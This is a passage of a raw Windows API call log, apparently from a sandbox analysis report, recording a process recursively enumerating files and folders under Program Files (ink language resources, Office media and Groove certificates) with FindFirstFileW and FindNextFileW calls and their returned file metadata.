ftLastWriteTime.dwLowDateTime=0xeb74b2cd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.957] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.957] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0034.957] FindNextFileW (in: hFindFile=0x3ed1180, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0034.957] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.958] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.958] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.959] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.959] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0034.959] FindNextFileW (in: hFindFile=0x3ed1180, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f4e4a1, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x92f4e4a1, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x92f9a75d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x186b84, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickAnimation.avi", cAlternateFileName="")) returned 1 [0034.959] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.959] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.959] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.959] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.959] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0034.959] FindNextFileW (in: hFindFile=0x3ed1180, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsdefinitions", cAlternateFileName="FSDEFI~1")) returned 1 [0034.960] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.961] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.961] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad", cAlternateFileName="")) returned 1 [0034.962] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1300 [0034.963] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.963] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2d7bf7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2d7bf7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2d7bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59a, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxbase.xml", cAlternateFileName="")) returned 1 [0034.963] FindClose (in: hFindFile=0x3ed1300 | out: hFindFile=0x3ed1300) returned 1 [0034.963] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f0a088 | out: hHeap=0x5f0000) returned 1 [0034.963] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0034.963] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1300 [0034.963] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.963] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x0, dwReserved1=0x0, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0036.492] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.541] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AFTRNOON", cAlternateFileName="")) returned 1 [0038.859] FindClose (in: hFindFile=0x3ed12c0 | out: hFindFile=0x3ed12c0) returned 1 [0038.870] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f12088 | out: hHeap=0x5f0000) returned 1 [0038.870] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0x0, dwReserved1=0x0, cFileName="WhiteDot.png", cAlternateFileName="")) returned 1 [0038.871] FindClose (in: hFindFile=0x3ed1300 | out: hFindFile=0x3ed1300) returned 1 [0038.871] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f02080 | out: hHeap=0x5f0000) returned 1 [0038.871] FindNextFileW (in: hFindFile=0x3ed1140, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9060745b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x9060745b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4877fc17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x379f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Filters.xml", cAlternateFileName="")) returned 1 [0040.538] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0040.538] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.538] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x130a0400, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x130a0400, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c438, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE10.MML", cAlternateFileName="")) returned 1 [0040.538] FindClose (in: hFindFile=0x3ed1340 | out: hFindFile=0x3ed1340) returned 1 [0040.538] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0040.538] FindNextFileW (in: hFindFile=0x3ed1300, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP", cAlternateFileName="")) returned 1 [0040.539] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1340 [0040.540] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbcce4400, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.541] FindNextFileW (in: hFindFile=0x3ed1340, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTOSHAP.DLL", cAlternateFileName="")) returned 1 [0042.010] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5e490770, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed13c0 [0042.011] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5e490770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5e490770, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.011] FindNextFileW (in: hFindFile=0x3ed13c0, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="groove.net", cAlternateFileName="")) returned 1 [0042.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\*", lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1240 [0042.056] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x582abeb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.056] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d2c00d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Components", cAlternateFileName="COMPON~1")) returned 1 [0042.056] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\*", lpFindFileData=0x2edeb9c | out: lpFindFileData=0x2edeb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d2c00d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1380 [0042.197] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x2edeb9c | out: lpFindFileData=0x2edeb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d2c00d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x2edeb9c | out: lpFindFileData=0x2edeb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bcf1000, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6bcf1000, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x0, dwReserved1=0x0, cFileName="SignedComponents.cer", cAlternateFileName="SIGNED~1.CER")) returned 1 [0042.197] FindClose (in: hFindFile=0x3ed1380 | out: hFindFile=0x3ed1380) returned 1 [0042.197] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ef2078 | out: hHeap=0x5f0000) returned 1 [0042.197] FindNextFileW (in: hFindFile=0x3ed1240, lpFindFileData=0x2edee18 | out: lpFindFileData=0x2edee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a95a430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ManagedObjects", cAlternateFileName="MANAGE~1")) returned 1 [0042.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\*", lpFindFileData=0x2edeb9c | out: lpFindFileData=0x2edeb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a95a430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1380 [0042.520] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x2edeb9c | out: lpFindFileData=0x2edeb9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a95a430, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a95a430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.520] FindNextFileW (in: hFindFile=0x3ed1380, lpFindFileData=0x2edeb9c | out: lpFindFileData=0x2edeb9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6bcf1000, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x5a95a430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6bcf1000, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, 